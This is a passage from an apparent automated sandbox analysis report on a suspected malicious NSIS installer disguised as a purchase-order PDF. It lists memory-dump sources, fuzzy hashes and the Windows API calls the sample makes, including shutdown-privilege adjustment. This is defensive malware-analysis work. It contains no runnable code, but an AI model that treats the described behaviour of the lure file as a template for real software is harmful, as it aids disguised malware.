                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bfea90c7a4e4efb213215a80dcdf6404a7b9ec5fd912b2b6c1104d19b09a5470
                                                                                                                                    • Instruction ID: 10e5f36117910e2fd7751865c541dfac6546246db889253af185b43a3a514a2b
                                                                                                                                    • Opcode Fuzzy Hash: bfea90c7a4e4efb213215a80dcdf6404a7b9ec5fd912b2b6c1104d19b09a5470
                                                                                                                                    • Instruction Fuzzy Hash: DFE08C9BA5E2C4CFD7238A3054AC2D27F21462731AB1D54DFD8449F593C2460C5ED702
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9dad5712c74611a75010ea4f700c97705f1b121d21a8fb603e91e1d118ae1319
                                                                                                                                    • Instruction ID: 00abe1e42a9a72c7774b4243a02ba9ede718d0370c8a7eda774fad39914fca80
                                                                                                                                    • Opcode Fuzzy Hash: 9dad5712c74611a75010ea4f700c97705f1b121d21a8fb603e91e1d118ae1319
                                                                                                                                    • Instruction Fuzzy Hash: E401A930801248DFDB049FA0CA487E8BBB2EF8A301F405478EA01BB290CB36599ADB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4ccfe75aeadfe84f48b1a60897de9306a80412579f68dfff8c581d23e88dd737
                                                                                                                                    • Instruction ID: 6cf8fd0c4f8e714890c0c18eb4bc52387b90a471e82cef201df777af4dd8637b
                                                                                                                                    • Opcode Fuzzy Hash: 4ccfe75aeadfe84f48b1a60897de9306a80412579f68dfff8c581d23e88dd737
                                                                                                                                    • Instruction Fuzzy Hash: A4F0C831F08618DFDB109F68C941BAFBBB6FB84350F00452AD50997651DB74B849CBD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6c3781f4d3e9cb884ac1a7be8d2a3d3954d15061f0b22fd1009da82e526c92e0
                                                                                                                                    • Instruction ID: d1a5898f4ff440dd7f9693964370308f5138b3dafc57adfec249cb971f79994c
                                                                                                                                    • Opcode Fuzzy Hash: 6c3781f4d3e9cb884ac1a7be8d2a3d3954d15061f0b22fd1009da82e526c92e0
                                                                                                                                    • Instruction Fuzzy Hash: 1EF03734E02608CFDB04DFB9D8496EDB7B5FF8A301F50A429C405B3251DB3AA915CB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 378213b0078130b560123b83bf229c1c7a9bc08dda7bb6735f39398d0baa36b7
                                                                                                                                    • Instruction ID: d2fb2ba01c99504288d18175f050fdc826dafc0b4bee13f819e34b148c720d61
                                                                                                                                    • Opcode Fuzzy Hash: 378213b0078130b560123b83bf229c1c7a9bc08dda7bb6735f39398d0baa36b7
                                                                                                                                    • Instruction Fuzzy Hash: 78F0EC2038130057D204666D55A5A7F67AEEFC13D1B014835F505D7258DEA8DC4653F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: db20e7cfd46af9907b337b54c523f4d2a9c61ef38734663d913b7373d14e671c
                                                                                                                                    • Instruction ID: bebc5d2c67d3e1dd24a71e261f412f8586300cab34c92592ff56c9648d304bfc
                                                                                                                                    • Opcode Fuzzy Hash: db20e7cfd46af9907b337b54c523f4d2a9c61ef38734663d913b7373d14e671c
                                                                                                                                    • Instruction Fuzzy Hash: 29F09835459F429FE3026B30ACBC2AA7FB0FF0B3137856D95E05AC6472DB694449CB11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f785ba607c8635156affecbe078cbc261826caf825d01155bb900bf574b254c3
                                                                                                                                    • Instruction ID: 0520cc155859796ae9a9f75a9a8d6a3232b6f53a4e36163e0800545727aaf0c8
                                                                                                                                    • Opcode Fuzzy Hash: f785ba607c8635156affecbe078cbc261826caf825d01155bb900bf574b254c3
                                                                                                                                    • Instruction Fuzzy Hash: F4F08C74D0A204DFC715EFB8D64829CBFB1EF09305F2080EAD854A7661EB368E49DB00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf0b9a0f58d735f73ed5f4242bd07800d82b1bb4c27d766e4360b907948373b7
                                                                                                                                    • Instruction ID: 15f2a88ddd55e8cd0bf8559abc0de7b5d388cc95968d03ca6dd4ad53326cc796
                                                                                                                                    • Opcode Fuzzy Hash: cf0b9a0f58d735f73ed5f4242bd07800d82b1bb4c27d766e4360b907948373b7
                                                                                                                                    • Instruction Fuzzy Hash: 8CE0D831D153D64EC7139BB098044DDBF30ED93210B4542E7D054BB052EB30194DC771
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7c6253c4e438e8d4d0968ce2ca30920633088720fb6d8ae0205cfc7b3df26a31
                                                                                                                                    • Instruction ID: 535189210ccedcb28aaa89f0984e92e13901f7bb6252ae7d6cfb6979062ddd04
                                                                                                                                    • Opcode Fuzzy Hash: 7c6253c4e438e8d4d0968ce2ca30920633088720fb6d8ae0205cfc7b3df26a31
                                                                                                                                    • Instruction Fuzzy Hash: 98E09234D05208DFC704DFB8D50969CBBF5EB48301F6084B9D818A3350E7309E45CB40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9768c843c6cf7b719e27ae9abf7289aa815758d372dbcb51443f0708865070a1
                                                                                                                                    • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                                                    • Opcode Fuzzy Hash: 9768c843c6cf7b719e27ae9abf7289aa815758d372dbcb51443f0708865070a1
                                                                                                                                    • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0c07139fc1237fea28aca0cd4628df3a68e64e7d7daf28281a89f7540b74aa8e
                                                                                                                                    • Instruction ID: 2f4840816c5c059c847a51bc8b7a61b85ad44f246092a5182fdacb2c4164fa09
                                                                                                                                    • Opcode Fuzzy Hash: 0c07139fc1237fea28aca0cd4628df3a68e64e7d7daf28281a89f7540b74aa8e
                                                                                                                                    • Instruction Fuzzy Hash: 60D06C74026E02DFE2002B60ACAC2BA7B74FB0B327BC02D00A10E920318B7C4454CA40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0598838d07a28689d298c414aecefe40d2a0d182b5d0a996b11a26353ed5dd42
                                                                                                                                    • Instruction ID: 065c2b9a4465eddba0c9a26abe32272329f49a7e2c3d50a313e3d9e392feee22
                                                                                                                                    • Opcode Fuzzy Hash: 0598838d07a28689d298c414aecefe40d2a0d182b5d0a996b11a26353ed5dd42
                                                                                                                                    • Instruction Fuzzy Hash: 27E0863504C3484ECB16A730ED946C93B7A9F41204F104565D40A0B96ADB780A4AAB11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                    • Instruction ID: 9968b1f7b0fc0b7bf7e049fa17098cae9ca96013ffba795bad1e7fd54a298b3b
                                                                                                                                    • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                    • Instruction Fuzzy Hash: F4C0123310C1286A9224504E7C469A3A74CC2C13B5A210177F93D8724054425C4411B4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7dca1a7c2e1a9f19f12ffc5082b6535219c52adc99dcce7a7105201160b5bb0d
                                                                                                                                    • Instruction ID: 03a833aa049696f79bb6749a4ba29ba89aae5f608410ad14f6962765005e125f
                                                                                                                                    • Opcode Fuzzy Hash: 7dca1a7c2e1a9f19f12ffc5082b6535219c52adc99dcce7a7105201160b5bb0d
                                                                                                                                    • Instruction Fuzzy Hash: EAD02B31C4A345CFC3429F60D5086D9BB309B07302F0440CAD80893552D7710E18D701
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 104a8d12bab6922f0b06b0bdd3159ca3da732b26aedc0d477d9b2cf00701b58b
                                                                                                                                    • Instruction ID: d4d2c4ce82f1c48cea51201760d006d7873f500c2e83bbf84c5db421ef7520c5
                                                                                                                                    • Opcode Fuzzy Hash: 104a8d12bab6922f0b06b0bdd3159ca3da732b26aedc0d477d9b2cf00701b58b
                                                                                                                                    • Instruction Fuzzy Hash: 28D0673AB400189FCB149F98EC809DDFB76FB98221B148116E915A3261C7319965DB60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cba54651166da191b93a5428ea6af568138f2cb522416f4af90ddd5de1abcbc9
                                                                                                                                    • Instruction ID: 6f38fc7459f3dc080ccfac797bbe471e984e17f3834a451d6efa623da87f888b
                                                                                                                                    • Opcode Fuzzy Hash: cba54651166da191b93a5428ea6af568138f2cb522416f4af90ddd5de1abcbc9
                                                                                                                                    • Instruction Fuzzy Hash: 07C01232246A10479628A21CB59189E576DCEC57517518D77A004C21184D54994F8185
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c9e52a03519935f5aa4ed14b2d46bf2ebaa81b572b9a107e37b19fabb1782e43
                                                                                                                                    • Instruction ID: b9550046fcc11e02f7ab29c67697bef4286692e6bd6e425529fa88c5a0ab0307
                                                                                                                                    • Opcode Fuzzy Hash: c9e52a03519935f5aa4ed14b2d46bf2ebaa81b572b9a107e37b19fabb1782e43
                                                                                                                                    • Instruction Fuzzy Hash: CDD0A72221E6E00FCB07C33D786089CBF715CC61243494AF6D098CB6F7DA456A4EC38A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5ec0e08a59e0a508150c3477bbf1027e20696a109e6739e5f63053116e28e957
                                                                                                                                    • Instruction ID: 73d14ec67b975014431165cd8f91b1ab234f217189b0aa5fe4d09f639e3b8858
                                                                                                                                    • Opcode Fuzzy Hash: 5ec0e08a59e0a508150c3477bbf1027e20696a109e6739e5f63053116e28e957
                                                                                                                                    • Instruction Fuzzy Hash: 5CD0223080220CDFC300DFA4D809BEAB77CE703303F4000ACA80863250CBB14D10C784
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6afd1b333b3a1d3973c26b8cb47af2151424e0c3b8a8e24dd30796f133aa08fb
                                                                                                                                    • Instruction ID: 2f9a8792f87d913af7b12a5130d7907993cad4a3785a189ab7a1236ebd7050a2
                                                                                                                                    • Opcode Fuzzy Hash: 6afd1b333b3a1d3973c26b8cb47af2151424e0c3b8a8e24dd30796f133aa08fb
                                                                                                                                    • Instruction Fuzzy Hash: E1C08CB4016E098BE2042F50BC0CB79B7B9B707313FC82D10E00E02831CBBC8424C644
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7552341feae387ce8103529ea3e1208335b02209488d2a54fb66c404ddc04e72
                                                                                                                                    • Instruction ID: be2be6251b6c2a58fdbfd013af15657506d659260161bde1976bb78119e46636
                                                                                                                                    • Opcode Fuzzy Hash: 7552341feae387ce8103529ea3e1208335b02209488d2a54fb66c404ddc04e72
                                                                                                                                    • Instruction Fuzzy Hash: 32C08C303A8604CFE200AA1EC984A1233ACEF85B04F0058E0F1088B639CA62FC008604
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a755af9d0d7de776740f0903d9955a53f85d68fc094348233f5262856f828b1d
                                                                                                                                    • Instruction ID: b5e9a27bae6c412dc22cfa7225768ecc0d8f27443587c28c1fc85dd2af56e402
                                                                                                                                    • Opcode Fuzzy Hash: a755af9d0d7de776740f0903d9955a53f85d68fc094348233f5262856f828b1d
                                                                                                                                    • Instruction Fuzzy Hash: F4C0123004430C4EC649FB65EE85A55777EEF802047508520A00A0797EEFBC5D8AAA90
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                                    • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                    • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                    • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                                    • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                                    • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                                    • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                                    • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                    • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                                    • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                                    • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                                    • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                                    • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                    • CopyFileW.KERNEL32(00442800,0042AA28,?), ref: 004036DB
                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                    • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                    • API String ID: 3586999533-3972089011
                                                                                                                                    • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                    • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                    • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                    • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 004050B1
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                    • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                    • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
